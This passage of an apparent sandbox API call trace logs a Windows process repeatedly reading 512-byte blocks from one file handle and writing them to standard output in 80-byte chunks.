nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.864] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.864] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] GetFileType (hFile=0x50) returned 0x1 [0129.864] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.864] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType 
(hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.865] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.865] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.865] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.865] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.865] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.865] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, 
lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.866] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.866] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.866] GetFileType (hFile=0x50) returned 0x1 [0129.866] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 
[0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] WriteFile (in: hFile=0x50, 
lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.867] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.867] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.867] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.867] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.868] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.868] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, 
lpOverlapped=0x0) returned 1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.868] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.868] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 
| out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.869] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.869] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.869] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.869] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26eb8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb8c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ebdc*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec2c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 
[0129.870] WriteFile (in: hFile=0x50, lpBuffer=0x26ec7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ec7c*, lpNumberOfBytesWritten=0x26dc80*=0x20, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.870] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dc6c | out: lpNewFilePointer=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=4) returned 0x58 [0129.870] ReadFile (in: hFile=0x58, lpBuffer=0x26ea9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dc8c, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesRead=0x26dc8c*=0x200, lpOverlapped=0x0) returned 1 [0129.870] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.870] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26ea9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26ea9c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26eaec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eaec*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] GetFileType (hFile=0x50) returned 0x1 [0129.871] _get_osfhandle (_FileHandle=1) returned 0x50 [0129.871] WriteFile (in: hFile=0x50, lpBuffer=0x26eb3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dc80, lpOverlapped=0x0 | out: lpBuffer=0x26eb3c*, lpNumberOfBytesWritten=0x26dc80*=0x50, lpOverlapped=0x0) returned 1 
